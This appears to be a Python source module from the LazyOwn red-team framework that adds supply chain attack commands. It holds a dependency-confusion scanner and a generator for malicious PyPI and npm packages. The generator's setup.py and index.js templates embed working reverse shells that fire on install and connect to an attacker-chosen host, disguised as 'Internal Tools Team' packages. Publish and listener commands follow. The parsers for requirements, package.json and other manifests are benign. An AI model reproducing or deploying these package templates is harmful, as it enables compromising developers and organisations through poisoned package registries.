"""Supply Chain Attack command set.

Covers dependency confusion scanning, package squatting detection, and
malicious package template generation for red team operations.
"""

from __future__ import annotations

import json
import os
import re
import shlex
import subprocess
import tempfile

import cmd2

from cli.commands._base import LazyOwnCommandSet
from utils import (
    print_error,
    print_msg,
    print_warn,
)

SUPPLY_CHAIN_CATEGORY = "01. Initial Access"

MALICIOUS_SETUP_PY = '''"""Setup script generated by LazyOwn Supply Chain Module."""

import os
import socket
import subprocess
from setuptools import setup, find_packages


class PayloadInstall:
    def __post_init__(self):
        try:
            host = "{lhost}"
            port = {lport}
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(10)
            s.connect((host, port))
            os.dup2(s.fileno(), 0)
            os.dup2(s.fileno(), 1)
            os.dup2(s.fileno(), 2)
            subprocess.call(["/bin/sh", "-i"])
        except Exception:
            pass


# Trigger on install
PayloadInstall()


setup(
    name="{package_name}",
    version="0.1.0",
    description="{description}",
    author="{author}",
    packages=find_packages(),
    python_requires=">=3.6",
)
'''

MALICIOUS_NPM_INDEX = '''// Package generated by LazyOwn Supply Chain Module
const {{ exec }} = require("child_process");
const net = require("net");

const HOST = "{lhost}";
const PORT = {lport};

(function() {{
    try {{
        const client = new net.Socket();
        client.connect(PORT, HOST, () => {{
            const sh = exec("/bin/sh -i");
            sh.stdout.pipe(client);
            sh.stderr.pipe(client);
            client.pipe(sh.stdin);
        }});
        client.on("error", () => {{}});
    }} catch(e) {{}}
}})();
'''

PYPI_REGISTRY = "https://pypi.org/simple/"
NPM_REGISTRY = "https://registry.npmjs.org/"


class SupplyChainCommandSet(LazyOwnCommandSet):
    """Supply chain attack operations."""

    phase = "exploit"
    category = SUPPLY_CHAIN_CATEGORY

    @cmd2.with_category(SUPPLY_CHAIN_CATEGORY)
    def do_depconfuse(self, line):
        """Scan a requirements.txt for dependency confusion candidates.

        Usage: depconfuse <requirements_file> [--check-registry]

        Parses a Python requirements.txt and checks which packages do NOT
        exist on PyPI (private/internal packages). These are vulnerable to
        dependency confusion attacks.
        """
        args = shlex.split(line)
        if not args or args[0].startswith("--"):
            print_error("Usage: depconfuse <requirements_file> [--check-registry]")
            return

        req_file = args[0]
        check_registry = "--check-registry" in args

        if not os.path.exists(req_file):
            print_error(f"File not found: {req_file}")
            return

        packages = _parse_requirements(req_file)
        if not packages:
            print_warn("No packages found in requirements file")
            return

        print_msg(f"Found {len(packages)} packages in {req_file}")

        vulnerable = []
        for pkg_name, version in packages:
            if check_registry and not _pypi_exists(pkg_name):
                vulnerable.append((pkg_name, version))
                print_msg(f"  VULNERABLE: {pkg_name}=={version} (not on PyPI)")
            elif not check_registry:
                if pkg_name.startswith(("my-", "internal-", "private-", "corp-", "company-")):
                    vulnerable.append((pkg_name, version))
                    print_msg(f"  SUSPECT: {pkg_name}=={version} (internal naming pattern)")

        if check_registry:
            print_msg(f"\n{len(vulnerable)} packages NOT found on PyPI - dependency confusion targets")
        else:
            print_msg(f"\n{len(vulnerable)} packages with internal naming patterns")
            print_msg("Re-run with --check-registry to verify against PyPI")

    @cmd2.with_category(SUPPLY_CHAIN_CATEGORY)
    def do_package_squat(self, line):
        """Generate a malicious PyPI package for dependency confusion.

        Usage: package_squat <package_name> [--lhost <ip>] [--lport <port>] [--type <pypi|npm>] [--description <text>]

        Creates a package with an install-time reverse shell payload.
        Outputs to sessions/supply_chain/<package_name>/.
        """
        args = shlex.split(line)
        if not args or args[0].startswith("--"):
            print_error("Usage: package_squat <package_name> [--lhost <ip>] [--lport <port>] [--type <pypi|npm>]")
            return

        package_name = args[0]
        lhost = _extract_flag(args, "--lhost") or self.params.get("lhost", "")
        lport = _extract_flag(args, "--lport") or self.params.get("lport", "4444")
        pkg_type = _extract_flag(args, "--type") or "pypi"
        description = _extract_flag(args, "--description") or f"Internal {package_name} utilities"

        if not lhost:
            print_error("Set lhost: assign lhost <ip>")
            return

        output_dir = f"sessions/supply_chain/{package_name}"
        os.makedirs(output_dir, exist_ok=True)

        if pkg_type == "pypi":
            setup_py = MALICIOUS_SETUP_PY.format(
                lhost=lhost,
                lport=lport,
                package_name=package_name,
                description=description,
                author="Internal Tools Team",
            )
            setup_path = os.path.join(output_dir, "setup.py")
            with open(setup_path, "w") as f:
                f.write(setup_py)

            readme_path = os.path.join(output_dir, "README.md")
            with open(readme_path, "w") as f:
                f.write(f"# {package_name}\n\n{description}\n")

            init_dir = os.path.join(output_dir, package_name.replace("-", "_"))
            os.makedirs(init_dir, exist_ok=True)
            with open(os.path.join(init_dir, "__init__.py"), "w") as f:
                f.write(f'"""Internal {package_name} package."""\n__version__ = "0.1.0"\n')

            print_msg(f"PyPI package generated in {output_dir}/")
            print_msg(f"Build: cd {output_dir} && python3 setup.py sdist bdist_wheel")
            print_msg(f"Upload test: twine upload --repository testpypi dist/*")

        elif pkg_type == "npm":
            pkg_json = {
                "name": package_name,
                "version": "0.1.0",
                "description": description,
                "main": "index.js",
                "scripts": {"postinstall": "node index.js"},
                "author": "Internal Tools Team",
            }
            with open(os.path.join(output_dir, "package.json"), "w") as f:
                json.dump(pkg_json, f, indent=2)

            index_js = MALICIOUS_NPM_INDEX.format(lhost=lhost, lport=lport)
            with open(os.path.join(output_dir, "index.js"), "w") as f:
                f.write(index_js)

            print_msg(f"NPM package generated in {output_dir}/")
            print_msg(f"Publish: cd {output_dir} && npm publish --registry <url>")

        else:
            print_error(f"Unknown type: {pkg_type}. Use: pypi, npm")

        print_msg(f"\nStart listener: nc -lvnp {lport}")

    @cmd2.with_category(SUPPLY_CHAIN_CATEGORY)
    def do_depscan(self, line):
        """Scan a directory tree for dependency files and flag risks.

        Usage: depscan <directory> [--output <report.json>]

        Scans for requirements.txt, package.json, Gemfile, pom.xml,
        Cargo.toml, go.mod and reports internal/non-public dependencies.
        """
        args = shlex.split(line)
        if not args or args[0].startswith("--"):
            print_error("Usage: depscan <directory> [--output <report.json>]")
            return

        target_dir = args[0]
        output_file = _extract_flag(args, "--output") or "sessions/depscan_report.json"

        if not os.path.isdir(target_dir):
            print_error(f"Directory not found: {target_dir}")
            return

        scanners = {
            "requirements.txt": _parse_requirements,
            "package.json": _parse_package_json,
            "Gemfile": _parse_gemfile,
            "Cargo.toml": _parse_cargo_toml,
            "go.mod": _parse_go_mod,
            "pom.xml": _parse_pom_xml,
        }

        report = {"directory": target_dir, "findings": []}

        for root, dirs, files in os.walk(target_dir):
            dirs[:] = [d for d in dirs if d not in (".git", "node_modules", "__pycache__", "venv", ".venv", "env")]
            for filename in files:
                if filename in scanners:
                    filepath = os.path.join(root, filename)
                    parser = scanners[filename]
                    try:
                        deps = parser(filepath)
                        for name, version in deps:
                            internal = is_internal_name(name)
                            report["findings"].append({
                                "file": filepath,
                                "package": name,
                                "version": version,
                                "ecosystem": filename,
                                "internal_suspect": internal,
                                "risk": "HIGH" if internal else "LOW",
                            })
                            if internal:
                                rel = os.path.relpath(filepath, target_dir)
                                print_msg(f"  HIGH: {name}=={version} in {rel}")
                    except Exception:
                        pass

        os.makedirs(os.path.dirname(output_file) or ".", exist_ok=True)
        with open(output_file, "w") as f:
            json.dump(report, f, indent=2)

        highs = sum(1 for f in report["findings"] if f["risk"] == "HIGH")
        print_msg(f"\nScan complete: {len(report['findings'])} deps, {highs} high-risk")
        print_msg(f"Report: {output_file}")


def _parse_requirements(filepath: str) -> list[tuple[str, str]]:
    """Parse a Python requirements.txt file.

    Args:
        filepath: Path to requirements.txt.

    Returns:
        List of (package_name, version) tuples.
    """
    deps = []
    with open(filepath) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#") or line.startswith("-"):
                continue
            line = re.sub(r"\[.*?\]", "", line)
            line = re.sub(r"\s*#.*", "", line)
            parts = re.split(r"[=<>~!]+", line, maxsplit=1)
            name = re.sub(r"[^a-zA-Z0-9._-]", "", parts[0].strip())
            version = parts[1].strip() if len(parts) > 1 else "*"
            if name:
                deps.append((name, version))
    return deps


def _parse_package_json(filepath: str) -> list[tuple[str, str]]:
    """Parse an npm package.json file.

    Args:
        filepath: Path to package.json.

    Returns:
        List of (package_name, version) tuples.
    """
    deps = []
    try:
        with open(filepath) as f:
            data = json.load(f)
        for section in ("dependencies", "devDependencies", "peerDependencies"):
            for name, version in data.get(section, {}).items():
                deps.append((name, str(version).lstrip("^~")))
    except (json.JSONDecodeError, FileNotFoundError):
        pass
    return deps


def _parse_gemfile(filepath: str) -> list[tuple[str, str]]:
    """Parse a Ruby Gemfile.

    Args:
        filepath: Path to Gemfile.

    Returns:
        List of (gem_name, version) tuples.
    """
    deps = []
    with open(filepath) as f:
        for line in f:
            match = re.match(r"""gem\s+['"]([^'"]+)['"]\s*(?:,\s*['"]([^'"]+)['"])?""", line.strip())
            if match:
                name = match.group(1)
                version = match.group(2) or "*"
                deps.append((name, version))
    return deps


def _parse_cargo_toml(filepath: str) -> list[tuple[str, str]]:
    """Parse a Rust Cargo.toml file.

    Args:
        filepath: Path to Cargo.toml.

    Returns:
        List of (crate_name, version) tuples.
    """
    deps = []
    with open(filepath) as f:
        in_deps = False
        for line in f:
            line = line.strip()
            if line == "[dependencies]" or line.startswith("[dependencies."):
                in_deps = True
                continue
            if line.startswith("["):
                in_deps = False
                continue
            if in_deps and "=" in line:
                name = line.split("=")[0].strip().strip('"')
                version_match = re.search(r'"(\d[^"]*)"', line)
                version = version_match.group(1) if version_match else "*"
                if name:
                    deps.append((name, version))
    return deps


def _parse_go_mod(filepath: str) -> list[tuple[str, str]]:
    """Parse a Go go.mod file.

    Args:
        filepath: Path to go.mod.

    Returns:
        List of (module_name, version) tuples.
    """
    deps = []
    with open(filepath) as f:
        for line in f:
            match = re.match(r"""\t([^\s]+)\s+v([\d.]+(?:-[^+\s]+)?(?:\+[^\s]+)?)""", line)
            if match:
                name = match.group(1)
                version = match.group(2)
                deps.append((name, version))
    return deps


def _parse_pom_xml(filepath: str) -> list[tuple[str, str]]:
    """Parse a Maven pom.xml file.

    Args:
        filepath: Path to pom.xml.

    Returns:
        List of (artifact_id, version) tuples.
    """
    deps = []
    try:
        import xml.etree.ElementTree as ET
        ns = {"mvn": "http://maven.apache.org/POM/4.0.0"}
        tree = ET.parse(filepath)
        for dep in tree.findall(".//mvn:dependency", ns):
            aid = dep.find("mvn:artifactId", ns)
            ver = dep.find("mvn:version", ns)
            if aid is not None and ver is not None:
                name = aid.text or ""
                version = ver.text or "*"
                if name:
                    deps.append((name, version))
    except Exception:
        pass
    return deps


def _pypi_exists(package_name: str) -> bool:
    """Check if a package exists on PyPI.

    Args:
        package_name: Package name to check.

    Returns:
        True if the package is registered on PyPI.
    """
    import urllib.request
    import urllib.error
    try:
        req = urllib.request.Request(
            f"{PYPI_REGISTRY}{package_name}/",
            headers={"User-Agent": "lazyown-depconfuse/1.0"},
        )
        urllib.request.urlopen(req, timeout=10)
        return True
    except urllib.error.HTTPError as e:
        return e.code != 404
    except Exception:
        return False


def is_internal_name(name: str) -> bool:
    """Check if a package name looks internal/private.

    Args:
        name: Package or module name.

    Returns:
        True if the name matches internal naming patterns.
    """
    internal_prefixes = (
        "my-", "internal-", "private-", "corp-", "company-", "enterprise-",
        "org-", "team-", "project-", "int-", "intl-",
    )
    return name.lower().startswith(internal_prefixes) or name.startswith("_")


def _extract_flag(args: list[str], flag: str) -> str | None:
    """Extract a ``--flag <value>`` pair from a list of arguments."""
    try:
        idx = args.index(flag)
        return args[idx + 1]
    except (ValueError, IndexError):
        return None


__all__ = ["SupplyChainCommandSet"]
